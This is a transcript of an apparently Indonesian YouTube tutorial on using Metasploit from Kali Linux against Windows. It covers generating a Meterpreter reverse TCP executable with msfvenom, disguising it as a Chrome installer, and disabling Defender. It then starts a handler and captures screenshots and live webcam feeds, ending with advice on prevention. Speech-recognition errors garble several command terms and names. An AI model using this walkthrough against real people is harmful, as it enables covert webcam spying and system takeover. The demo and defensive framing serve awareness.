Oke, Assalamualaikum warahmatullahi wabarakatuh dan selamat pagi, siang, ataupun malam ya dimanapun kalian berada juga. Kembali lagi bersama saya Fikri Sanudin Iman dan untuk video kali ini ya, saya akan mencoba untuk membahas seluk-beluk mengenai sesuatu hal yang menurut saya menarik ya. Tetapi ada sisi buruknya jikalau ini dipegang oleh tangan-tangan yang tidak bertanggung jawab. Namun di satu sisi ini bisa menjadi bahan pembelajaran bagi kita yang emang niatnya belajar ya. Sebagaimana untuk kita mengantisipasi sekiranya beberapa kejadian seperti ini bakal kejadian di masa depan. Nah, topik yang akan dibahas itu adalah bagaimana kita bisa menerobos akses dari webcam ya atau breaching webcam akses menggunakan Metasploit via Kali Linux yang dijalankan di VirtualBox. Oke, untuk pembahasan mengenai seluk-beluk dan sebagainya macamnya akan langsung kita lanjutkan ke dalam misi videonya. Oke, tanpa berbasa-basi lagi, langsung saja kita lanjut. Cus. Oke, langsung saja kita masuk ke pembahasan awal dulu mengenai seluk-beluk sedikit lah kita kenal daripada Metasploit itu apa sih? Oke, langsung saja. Metasploit itu sebenarnya termasuk ke dalam golongan penetration testing ya. Eh, Penetration testing itu sendiri mengenal bagaimana, misal nih, how can someone with malicious intent mess with my network, atau gimana jika seseorang yang punya niatan jahat ya itu bisa punya niatan untuk gimana ngerusakin network kalian atau jaringan kalian. Nah, oke. Dan Metasploit itu adalah salah satu toolnya atau alatnya ya untuk gimana kita tahu oh bisa begitu ya ternyata. Nah, dia adalah framework yang open source berbasis Ruby, bisa dites via command line alteration atau lewat GUI. Oke, lalu Metasploit ini bisa dibilang cukup powerful ya. Jikalau memang di tangan yang salah, tadi saya udah bilang di awal, bisa cukup berbahaya efeknya. Oke, dengan sejarah awal Metasploit sendiri, sebagaimana dijelasin di sini ya, itu di develop oleh HD Moore pada tahun 2003, lalu berkembang, develop lagi ke dalam versi Ruby-nya tahun 2007, lalu di license di acquire oleh Rapid Heaven pada tahun 2009. Dan kenapa kita menggunakan Kali Linux untuk kesempatan kali ini ya, karena ada bagian atau portions dari toolnya itu yang ada di Metasploit framework itu sudah built-in ke dalam Kali Linux, jadi kita nggak perlu banyak install lagi untuk menjalanin gimana sih Metasploit itu. Dan framework Metasploit ini sendiri udah jadi salah satu go to framework ya, atau framework pilihan untuk pengembangan terkait dengan exploit, mengetahui gimana sih seseorang bisa mengeksploit sistem begitu ya, dan sebagainya macamnya. Nah, untuk kesempatan yang kali ini ya, untuk kesempatan kita kali ini di video kali ini ya, sebenarnya Metasploit itu oke, kita lihatkan sedikit. Bukan, oh wait. Ini Metasploit itu kan bisa digunakan ya, seperti bisa dilihat di sini juga, bisa digunakan di berbagai platform, dari Android, PHP, Python, Java, dan lain-lainnya. Cuma nantinya untuk kali ini kita mencoba untuk nerobos daripada sistem Windows ya, dan menerobos sistem Windows itu dengan pada akhirnya tujuannya untuk mengetahui gimana akses webcam dari si device-nya itu bisa ditembus begitu ya, bisa di breach. Oke, mungkin setelah ini kita akan langsung masuk aja ke gimana jalannya daripada breaching atau penembusan dari Metasploit itu di uh, sistem Windows tadi ya. Oke, langsung saja kita lanjut ke bagian yang selanjutnya.
Oke, kita langsung saja masuk ke bagian pembahasan gimana sih cara ngejalanin Metasploit itu. Tapi ya sebelum kita masuk ke dalam gimana sih bisa menjalankan Metasploit itu, ada beberapa hal yang perlu diperhatikan terlebih dahulu sebelum kita bisa melakukan Metasploitnya. Yang pertama, daripada Windows Defend, pasti kalau kalian kebanyakan mungkin udah yang nonton, saya yakin udah paling nggak menggunakan Windows 10 dan 11 ya, later version daripada Windows gitu. Nah, juga berlaku sebenarnya untuk kayak Windows 7 dan 8, tapi biasanya lebih ketat di yang versi later atau versi belakang. Nah, untuk menjalani Metasploit ini kalian harus yang pertama ngematiin akses daripada Windows Defender. Jadi semua Defender ini kan antivirus bawaan dari Windows ya. Jadi semua akses Defender ke sistem itu harus kalian matikan terlebih dahulu. Jadi semacam real time protection dan sebagainya macamnya itu dinonaktifin dulu. Dan walaupun sudah dinonaktifin, ada kemungkinan ketika kalian nanti mencoba, kita spoiler dikit ya, run program Metasploitnya, bukan program sih, lebih ke hasil create-nya tadi ya. Nah, itu tetap bakal keblok sama yang namanya Windows Defender, tapi lebih ke versi softnya. Nah, itu karena sistemnya sekarang cukup modern ya, jadi masih bisa ngedetect walaupun real time protection dan sebagaimana mati. Jadi ada kemungkinan nanti di kedepannya pas ketika run itu ada blokade begitu, dan mau nggak mau harus di add ke whitelist atau di istilahnya dihiraukan begitu nantinya. Dan juga nantinya di Kali Linux ya, ini kita lihat ada videonya nanti. Masuk sekarang videonya. Oke, di Kali Linux ya, ketika kalian buka Kali Linux dan mencari virtual mesinnya ya, yang dalam kasus kali ini berarti Kali Linux ini ya, Kali Linux, kalian harus ubah dulu daripada setting network daripada si virtual mesinnya. Jadi kita tunjukkan di sini ya, defaultnya adalah dari kalian sendiri kan not attached ya, atau tidak tersambung kemanapun. Kalian ubah ke bridge adapter. Lalu untuk device-nya atau adapter device-nya itu kalian gunakan sesuai keperluan, bukan keperluan sih, lebih ke pemakaian kalian. Kalau di device ini kan ada dua ya, ada Qualcomm Atheros ini buat wireless network, dan Realtek PCIe untuk LAN ya. Jadi karena kita di praktek kali ini menggunakan WiFi dan itu lebih umum digunakan ya, jadi kita menggunakan yang wireless network adapter. Oke. Oke, setelah ini baru kita bisa menjalankan nantinya proses daripada Metasploitnya. Tapi masih ada proses sebelum kita benar-benar bisa tahu gimana sih cara jalannya Metasploit ini. Oke, langsung saja nanti kita lanjut ke bagian selanjutnya untuk gimana persiapan awal. Selain tadi kan ini cuma notice ya, yang bisa cuma notice. Untuk bagian selanjutnya itu persiapan awal gimana nyiapin agar Metasploitnya bisa jalan. Oke, tanpa basa-basi lagi langsung saja kita lanjut. Oke, sekarang kita coba lanjut ke gimana sih cara mempersiapkan dahulu untuk ngerun nantinya program Metasploit ya. Oke, pertama-tama yang jelas kita akan membuka Kali Linux-nya. Sepertinya mungkin daripada yang nonton video ini sih udah pasti udah pernah install Kali Linux-nya dan juga pernah ngerun ya paling nggak. Jadi dibuka dahulu Kali Linux-nya dan masukin username, password dan sebagainya macam itu. Lalu sampaikan di bagian homepage dulu ya. Nah, oke, sekarang kita udah masuk di bagian homepage. Yang sekarang kita lakukan adalah pertama-tama kita buka dahulu terminal, salah satu terminal ya dulu. Saran saya sih terminal biasa aja ya, bukan yang administrator atau yang versi root dahulu. Nanti itu kita akan pakai tapi selanjutnya. Nah, oke, kita buka yang normal saja dahulu, lalu inputkan komen sudoku nantinya untuk akses rootnya ya, akses root. Lalu nah ini kita sebelum di komen create program daripada konektor ya, kalau saya bilang sih konektor ya,
antara si Metasploit yang ada dikali sama device-nya. Nah, dan nanti juga dipakai sih ketika ngeren awal Metasploit ya, sebelum ngebuka aksesnya. Nah, kita perlu tahu dulu IP, atau ya kalau bahasa simpel itu alamat dari jaringan ya, alamat dari jaringan yang akan kita tembus nanti. Nah, untuk mengetahui IP address tersebut, kita bisa gunain kalau di Linux ya, ini sebagai yang kita tunjukin di sini. Setelah tadi sudosu ya, bakal masuk ke fitur root ya, kita jalankan yang namanya ifconfig. Nah, nanti akan muncul dua bagian antara ETH0 ini sama LO, dan kita bisa lihat juga ada tulisan seperti up broadcast running, upload back running. Nah, kita pakai yang broadcast karena nantinya kan sistemnya Metasploit ini kan kayak nge-broadcast gitu. Jadi kayak device yang kita tembus itu nge-broadcast apa yang ada di situ ke program Metasploitnya nanti. Nah, jadi kita pakai yang broadcast ya. Bisa dilihat itu ada IP-nya. Kita bisa lihat di sini inet sama dengan inet 192.168.1.6. Ini IP address di komputer lokal saya. Bisa berbeda-beda di tiap device, nanti tergantung tiap device dan juga jaringannya nanti berbeda di jaringan-jaringannya. Oke, setelah kita tahu IP address-nya ini, nah baru kita lanjut ke bagian yang selanjutnya, yakni mempersiapkan programnya tadi. Oke, untuk mempersiapkan program tadi ada baiknya kita buka lagi satu terminal dan juga buka akses juga ke sudosu ya. Sudosu, lalu nah ini adalah komen daripada menciptakan program konektor antara nantinya si Metasploit yang di Linux sama device yang di bridge nanti. Ya, bisa kita lihat ini adalah MSF Venom. Nah, ini MSF Venom ini adalah bagian daripada Metasploitnya tadi atau exploitnya ya. MSF Venom, lalu ini adalah komennya MSF Venom min P. Lalu ini adalah lebih ngedetailin daripada device yang mau kita bridge nantinya. Jadi sistemnya adalah Windows, lalu ini adalah bit daripada sistemnya. Karena di device saya menggunakan 64 bit, makanya jadi x64. Untuk device lain, kalau mau secara umum bisa pakai x86 terus 32 bit juga diterima di device 64, cuma mungkin akan lebih lambat kerjanya. Ini kita menyesuaikan saja sama device umumnya, jadi pakai 64 bit begitu. Lalu Meterpreter reverse TCP, ini Meterpreter itu buat payloadnya nanti ya, sama reverse TCP. Lalu langsung ke local hostnya atau hostnya daripada device yang mau kita bridge tadi. Nah, berarti kalau local host bridge device tadi kita sesuaikan sama device yang emang mau kita bridge, berarti di sini ya config-nya kita sesuaikan ya sama yang di komennya, berarti lhost sama dengan 192.168.1.6. Lalu lanjut ke lport. Ini sebenarnya dari beberapa yang saya tahu bebas, cuma mungkin biar lebih aman ya, kita enak juga ngingatnya nantinya pakai saja 1234, dan itu juga biasanya sih kosong begitu. Jadi posisi 1234 itu biasanya kosong dan gak ada yang ngisi dan cukup mudah diingat begitu ya. Lalu minf.exe berarti nanti format akhir tujuannya itu akan dibentuk ke executable. Kalau di Windows kan exe ya, executable itu buat programnya bisa dijalankan. Lalu nanti tanda lebih dari itu buat nunjukin hasilnya nanti gimana. Lalu kita namakan sesuai dengan nama file yang emang mau kita run nantinya. Nah, cukup menariknya di sini gini. Nama file ini kan bisa kita ubah sesuai hati ya. Nah, disinilah ketika kalau orang-orang yang punya niat jahat nih, itu bisa dimanipulasinya di sini. Nah, begini,
sering mana yang kita tahu kan kalau kita download, bukan download sih, lebih ke buka punya device baru nih, pengen browser lainnya daripada browser bawaan kan. Salah satu yang paling sering kan ini sebut merek ya, Google Chrome gitu. Nah, salah satu option daripada kebanyakan warga yang baru saja misalnya punya laptop, tapi udah punya laptop, pengen punya browser baru selain browser defaultnya. Biasa pilihannya jatuh ke Google Chrome karena emang kebiasaan di HP dan lainnya pakai Chrome kan, jadi ada Chrome nih di PC lebih enak nih, karena integrasi sama device mobile ya. Nah, ketika si yang orang jahat ini itu dia bisa manipulasi nama file itu jadi chrome setup.exe. Nah, ini mirip banget, bukan mirip banget, bahkan sama persis dengan nama file dari yang emang download Chrome yang aslinya. Nah, jikalau orang-orang ini nggak paham secara benar ini bahwa file ini bukan Chrome setup dan dijalankan, nah di situ bisa dijalankan bridge-nya tadi oleh si orang yang nggak bertanggung jawab tadi. Mereka ngira mereka jalankan Chrome setup, padahal tidak. Mereka jalankan Metasploit-nya gitu. Oke, ini kalau di kita karena bikin agak eksperimen aja, maka nama film jadi testing meter Fikri, nama saya sendiri ya, testing meter Fikri 1.exe. Oke, nanti ketika diklik enter lalu kita tunggu, nanti bakal keluar hasilnya udah selesai dibikin ya. No platform select dan bla bla bla. Nah, ini ada payload size dan final size of Excel file. Nah, file ini nantinya kita cek ya, coba pakai command ls yang ada di Kali Linux ya. Nah, itu tersedia di bagian folder sini nantinya. Bagian yang atas ini folder, lalu di bagian home-nya ada ini masing-masing folder, ada desktop, dokumen, download, musik, dan bla bla bla. Lalu ada file kita di sini. Nah, kalau file ini masih ada di Kali Linux, ini masih belum berbahaya karena Kali Linux sendiri itu bukan ngejalanin executable ini, formatnya beda. Nah, agar bisa dijalankan tadi, maka file ini harus ada di device Windows si targetnya tadi. Nah, kalau di saya berarti saya harus mengeluarkan ini dari area Kali Linux ke area Windows yang akan di bridge, yang dalam kasus ini saya coba pakai laptop saya sendiri ya. Nah, oke, kita lanjut ke bagian selanjutnya, yakni gimana caranya jalankan Metasploit-nya ketika si file sudah ada di device tadi. Oke, kita lanjut ke bagian yang selanjutnya. Oke, kita lanjut ke bagian yang ini, di mana bagian yang ini kita akan menjelaskan gimana sih cara nge-run exploit-nya daripada Metasploit ini untuk akses bridge daripada webcam. Ini kita coba webcamnya, dan sebenarnya range-nya exploit ini cukup luas, bahkan sampai bisa, kalau dalam beberapa kasus yang saya coba juga bisa ngebuka notepad sendiri, bahkan bikin folder sendiri, benar-benar di bridge sistem aksesnya, bukan atas kendali si yang punya device. Nah, kita mungkin bakal coba mungkin lebih ke screenshot ya, atau tag picture daripada device yang ada yang lagi jalan ini. Lalu selanjutnya mungkin selain tag gambaran device-nya apa, kita ngeliat gambaran orang yang mengakses atau webcamnya daripada si pemegang device ini. Nah, oke. Untuk cara ngejalaninnya setelah tadi kita selesai create ya, dan kita pindahin juga, kalau dalam kasus orang-orang yang jahat tadi kan mungkin diselipin di download di mana gitu. Nah, kalau yang ini kita secara sukarela mindahin ke salah satu biar aman ya, salah satu folder bukan terisolasi, lebih asing aja, jadi kita bisa lihat juga perubahan-perubahan dan sebagainya macam nantinya. Oke, kita langsung udah sampai di folder, kita pindah lagi ke Kali Linux-nya, lalu buka sebuah terminal baru lagi dan buka akses root-nya dengan sudo seperti biasa ya. Oke, setelah sudo terakses, lalu kita mencoba membuka konsol daripada Metasploit ini.
komennya adalah MSF Console. Sebenarnya kalau kalian mau buka secara lebih detail itu bisa aja langsung pakai MSF Console. Namun karena kita mencoba menyingkat waktu dan mempersedikit resource yang dipakai ya, karena kan kali Linux ini cukup berat kerannya, maka kita menggunakan MSF Console Q. Jadi langsung di skip ke komen selanjutnya yang bisa diinput. Oke, kita sambil menunggu. Nah, oke, nanti setelah menunggu beberapa waktu akan muncul MSF6. Nah, ini menerima inputan daripada selanjutnya yang mau dijalankan. Nah, di MSF6 ini kita bisa run pertama dulu komennya ini use exploit /multi/handler. Ini bakal ngebuka akses ininya ya, configurationnya tuh payload generic. Nah, setelah itu kita lanjut ke set payloadnya, sesuaikan sama program yang emang udah kita bikin tadi, program konektor tadi ya. Maka kita set di sini set payload Windows, sesuaikan yang tadi ya, Windows x64 Meterpreter reverse TCP. Oke. Selanjutnya, nah ini kita lanjut ke akses jaringannya. Nah, di sini kita set localhostnya sesuai sama yang ada di ifconfig tadi ya. Berarti itu 192.168 bla bla bla. Dan juga kita lanjut ke set airportnya. Berarti sesuaikan dengan yang ada di program tadi, berarti 1234. Nah, nanti ketika sudah set airport, kita lanjutkan ke proses membukanya, berarti exploit. Nah, ketika di exploit dia bakal muncul starting ya untuk reverse TCP handler itu yang sesuai dengan inputan tadi, berarti saat IP-nya 192 dan bla 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 dengan port 1234. Nah, untuk Metasploit ini bisa berjalan seperti yang saya sebutkan sebelumnya, berarti program yang konektor tadi itu harus dijalankan juga di device targetnya. Yang saya coba omongkan tadi kan mungkin lebih ke ketidaksengajaan ya, karena kayak filenya sama namanya kita run gitu. Nah, orang-orang nggak tahu dan belum jadi. Nah, kalau di kasus ini karena kita jadi kita sukarela buka di file explorernya. Oke, ketika di run, nah setelah di run tadi maka akan muncul ini pesan selanjutnya, ini sending stage sesuai ukurannya ke IP address tadi. Lalu Meterpreter session langsung di open, tembus berarti, dan akan muncul komen Meterpreter yang di bawah ini. Nah, ini kita coba salah satu komen awal dulu ya, mau coba tes, yakni Meterpreter screenshot. Ini bakal ngambil tampilan layar yang sedang diakses oleh si pengguna yang, kalau dalam kasus kita tadi mungkin pengguna yang tidak beruntung ya. Oke, nanti setelah dilanjutkan ke Meterpreter screenshot, maka screenshot yang ada di device target itu bakal otomatis masuk ke Linux-nya kalian yang akses tadi. Oke, sebagai kita tunjukkan di sini. Nah, ini adalah screenshot daripada yang diambil daripada apa namanya, screenshot yang diambil dari apa namanya, dari device yang target tadi ya. Nah, ini juga kita nyoba untuk komen, bisa kalian coba komen help, itu bakal ngebuka semua komen yang bisa dijalankan pakai Meterpreter. Dan seperti yang saya bilang sebelumnya, ini alat cukup sangat powerful, dimana ini banyak banget option yang kalian bisa bridge di sini. Tapi kita di sini agak mencoba sedikit lebih ringan. Tapi kalau saya bilang tadi juga di awal, jikalau orang yang nggak bertanggung jawab, ini bisa benar-benar dieksploit, bener. Oke, kita coba ini komen selanjutnya aja, webcam snap, dan bisa kita lihat juga hasilnya, dia ngambil tampilan foto langsung daripada webcam yang sedang jalan sekarang. Dan ini
tampilannya. Ini mohon maaf muka saya agak jelek di sini ya. Tapi kalian bisa dapat gambarannya, berarti ketika kalian nggak sadar webcam itu terbuka, aksesnya nyala, dan kalian mungkin nggak sengaja klik-klik yang random begini, dan ternyata ada yang akses di belakang atau jauh mungkin dari kalian pakai MetaPrater ini, bisa diketahui langsung data diri kalian walaupun kalian nggak sadar sama sekali. Oke. Lanjutnya kita ke pakai ini webcam stream. Ini salah satu yang cukup populer dan cukup berbahaya juga. Nah, webcam stream ini seperti namanya stream ya, berarti dia bisa nampilin feedback langsung dari webcam kalian yang tersambung ke device ini secara langsung, dan bahkan seperti kalau misalnya perumpamaan saya itu live IG atau live TikTok, bener-bener live jalan videonya. Namun untuk benar-benar bisa kelihatan jalan videonya mungkin perlu spek yang lebih tinggi ya. Kalau di saya ini kebetulan karena spek di setnya itu cukup rendah untuk Linux, maka agak nge-freeze gitu. Tapi kalian bisa dapat gambarannya gimana ini bisa nge-bridge webcam kalian. Oke, kita jalankan. Nanti setelah dimasukkan inputannya di terminal Linux tadi, maka dia akan ngebuka sebuah page untuk di browser. Dan kalau browser bawaan kalian kan Firefox ya, akan ngebuka browser di sini dengan halaman itu. Nah, Metasploit screen share. Jadi bisa kalian itu ada target IP-nya, IP target yang sekarang lagi di bridge. Lalu kapan waktunya? Ini 726 tapi pakai GMT 04 ya, mundur ke belakang, dan statusnya lagi playing, berarti lagi on. Dan ini bisa kalian lihat juga ke bawah sedikit, kita scroll tuh, ini live feed, bener-bener live di saat itu dia ngakses. Dan ini untuk cara keluarnya kita coba tunjukin sedikit aja, itu pakai Ctrl C. Oke, ini kita coba close ya. Tapi kalian bisa lihat sendiri tadi di beberapa kesempatan sebelumnya webcamnya itu tembus pakai snap atau pakai stream tadi. Dan ya, kalau kalian nggak duga sama sekali, itu adalah hal yang cukup kalian nggak mau terjadi di kehidupan kalian. Oke, setelah kita ngeliat tadi, mungkin akan ada pembahasan selanjutnya, mungkin lebih ke apa sih Metasploit ini. Dan ya tadi kan kita sudah bahas gimana sih Metasploit itu bekerja dan dasar belakang atau latar belakang dari Metasploit itu. Dan ya, kita bakal sedikit bahas lebih dalam sedikit untuk Metasploitnya itu seperti apa. Oke, kita bagian lanjut. Oke, ini saya coba mungkin ngebahas sedikit apa yang kita dapetin dari hasil Metasploit tadi ya. Nah, ini bisa dilihat di Linux dan kita coba open foldernya. Bisa kalian lihat beberapa file tangkapan dari hasil bridging tadi. Mungkin namanya emang random ya, cuma kalian bisa ngerti gimana kejadiannya saat itu. Ini tadi untuk yang file RLX itu adalah tangkapan screenshot dari device yang di bridge. Karena kebetulan device yang di bridge ini saya sendiri, dan saya sendiri pun ngebuka Linux secara full halaman, maka hasil screenshotnya adalah tampilan Linux dengan window ini tadi. Lalu untuk dua gambar ini, salah satunya itu adalah webcam snap, foto dari webcam snap, dan webcam stream. Webcam stream di sini mungkin dia nggak kelihatan seperti video ya kalau untuk di file, cuma di sini adalah thumbnailnya ya, buat start di awal gitu, thumbnail daripada stream nantinya. Dan ya seperti yang saya bilang,
Metasploit ini ada punya dua sisi, seperti pisau bermata dua ya. Di satu sisi ini bakal bahaya banget. Sekira pertama kalian orang yang sifatnya itu nggak tahu-tahu atau nggak mawas diri terhadap apa-apa yang mungkin di-download atau apa-apa yang mungkin diterima dari orang, file-file dan sebagainya macam, dan langsung semua dimasukin ke komputer tanpa ada check and recheck. Sebagaimana kejadian kayak gini terjadi, pasti banget kalau saya bisa bilang hampir 100% yang punya niatan jahat itu bakal ngecoba exploit apapun ya, mulai dari mungkin screenshot, lalu mungkin webcam strap, itu bisa pertama dibuat doxing, ngebuka data diri, dan mungkin dijual juga datanya. Mungkin juga ketika kalian run itu ada data-data pribadi yang kalian buka dan secara exploit itu di screenshot dan sebagainya macam. Atau mungkin yang lebih parah, kondisi kalian saat itu mungkin mohon maaf nih nggak senang atau gimana, webcam terbuka, PC terbuka, meter tembus. Saya nggak tahu kalau ada saat momen kayak gitu ya, bakal dampaknya buruk banget kalau apa namanya, kalau kejadian-kejadian gitu kejadian, dan saya tentunya nggak berharap kejadian seperti itu ada kejadian kalian. Dan di sisi baiknya kalau saya bisa bilang, kita bisa tahu nih gimana cara kerja orang-orang jahat tadi, dan kita juga bisa cari cara bagaimana sih ngeantisipasi untuk kejadian-kejadian ini nggak pulang, dan kita juga bisa buat peringatan ke orang-orang yang emang sekiranya belum mawas diri soal hal-hal seperti ini. Jujur aja hal ini cukup simple. Sekiranya orang-orang ini ngerti pencegahannya, ngerti gimana cara jalan kerjanya, tentunya kasus-kasus seperti itu bisa dikurangin. Karena seperti yang kita tahu ya, dunia internet ini kan semakin ke depannya semakin luas dan semakin cepat perkembangannya, dan paling enggak kita bisa mencegah hal-hal yang paling enggak yang segini dulu, yang kalau kata saya ini cukup simpel untuk dijalankan. Untuk yang ngehack ya, atau yang bukan ngehack, lebih orang-orang buruk tadi, cukup simpel untuk dilakukan. Kita bisa blok dulu sebelum ada yang lebih advance lagi ke depannya. Nah, solusi yang bisa saya coba, mungkin bukan tawarkan, lebih ke sarankan ya. Yang pertama itu sih selalu untuk pengguna Windows ya, kalau misal device-nya Windows, selalu aktifin Windows Defender. Apapun kejadiannya, apapun posisi kalian, device itu selalu coba amankan, paling setidaknya Defender. Bisa pakai antivirus lain, tetapi Defender itu sudah cukup bagus mempertahankan PC kalian daripada hal-hal yang nggak diinginkan. Seperti yang tadi saya bilang di awal, walaupun sekiranya Windows Defender ini pun mati, dia masih bisa ngeblok dengan memberi peringatan dulu, ini file cukup berbahaya, apakah mau di-run atau enggak. Berarti nah, lanjut ke poin kedua, itu ke diri sendiri. Nah, tadi seperti yang saya sebutkan di poin pertama, Windows Defender pun ketika dia posisinya real time-nya mati, dia masih bisa ngasih peringatan bahwa mungkin file ini berbahaya, apakah Anda ingin run atau enggak. Nah, disitulah peran diri Anda sendiri sebagai pengambil keputusan. Pertimbangkan baik-baik setiap aksi yang Anda lakukan di internet ya. Mungkin dari download, bahkan download file, mungkin upload sosmed dan post. Ini mungkin nggak berkaitan banget untuk upload, tapi cukup ya berrelation dengan internet ya. Jadi berhati-hati banget untuk setiap aksi Anda di internet, karena internet itu dunia yang benar-benar untuk sekarang sangat bebas ya. Kita nggak tahu benar-benar ini baik atau buruknya, karena semuanya benar-benar bisa diakses dengan bebas. Kita juga nggak tahu baik buruknya, jadi ada baiknya setiap aksi itu dilakukan dengan penuh pertimbangan dahulu. Dan mungkin juga selain pertimbangan tadi, lebih ke gimana kita lebih mawas diri soal perkembangan teknologi, terutama yang exploit begini. Karena jujur aja perkembangan exploit begini kan semakin harinya semakin lebih advance ya, semakin lebih rumit, dan semakin lebih susah juga di blok. Setidaknya kita coba cari tahu dulu gimana caranya memblok yang hal-hal lebih simpel dahulu sebelum nanti kita pindah ke yang lebih advance atau lebih rumit. Dan ya salah satunya juga kebiasaan ya,
orang Indonesia ini kan kalau saya pengamatan ya cukup bebas menggunakan internet, benar-benar seperti tidak ada rules gitu. Nah, ini mungkin bisa kita coba buat perlahan-lahan, seperti mungkin salah satunya di bagian download, cari tempat download yang resmi dan ya terjamin begitu kan keamanannya, daripada beresiko download di tempat yang macam-macam dan juga resikonya pun macam-macam. Salah satunya mungkin ya seperti ini gitu. Jadi secara dasar ya itu ada dua. Pertama itu sistem keamanan di device itu benar-benar dijaga ya, kayak tadi kan defender dan antivirus, dan juga dari diri sendiri dengan sikap tadi ya, gitu sih balas. Oke, mungkin pembahasan yang ini cukup, mungkin kita langsung ke bagian yang selanjutnya. Oke, kita mungkin sudah sampai di bagian akhir video ini, yakni mungkin kesimpulannya. Kesimpulan yang bisa saya ambil untuk pembahasan di hari ini, di video kali ini, Metasploit ini device, bukan device nih, lebih ke tool untuk nge-bridge device sesuai si keinginan ya. Kalau dalam kasus kali ini kan kita pakai Windows ya, dan juga bisa di kasus lain Android dan sebagainya macamnya. Metasploit ini cukup berbahaya kalau saya bilang, jikalau di tangan orang-orang yang enggak bertanggung jawab. Tetapi ketika di tangan orang yang bertanggung jawab, tentunya ini bisa bermanfaat lebih baik, seperti mungkin mengetahui gimana letak celah keamanannya dan sebagainya macamnya. Lalu juga untuk gimana sih cara mencegah kejadian-kejadian seperti ini terulang. Seperti yang saya omongkan juga di bagian sebelum ini, yakni ada dua komponen utama. Yang pertama, dari device kalian selalu coba jaga keamanannya, semisal dari antivirus, lalu paling nggak bawaan dari Windows Defender itu sudah cukup lumayan untuk menahan serangan-serangan yang tidak mengenakan ini ya, serangan-serangan internet ini. Lalu kedua juga kembali ke sifat diri sendiri kalian, lebih mawas diri terhadap situasi-situasi yang mengancam seperti ini, lalu juga menjaga aktivitas kalian di internet untuk selalu coba dengan penuh pertimbangan begitu. Lalu juga lebih ke pencegahan lain itu lebih ke seperti download tempat resmi, dan istilahnya aksi-aksi kalian itu lebih dipertimbangkan lagi selama di internet. Oke, mungkin untuk pembahasan kali ini dengan kesimpulannya cukup sampai di situ. Saya mohon maaf jika ada salah-salah kata ataupun perbuatan selama dalam video kali ini. Jangan lupa like, share, jangan lupa untuk like, komen, lalu share juga dari video ini, dan mungkin subscribe channel ini untuk video-video menarik berikutnya. Oke, mungkin untuk video kali ini kita cukupkan sampai sini dulu. Kurang lebihnya mohon maaf. Wabillahi taufiq wal hidayah. Assalamualaikum warahmatullahi wabarakatuh. Selamat pagi, siang, atau maupun malam dimanapun kalian berada, dan sampai jumpa di video selanjutnya.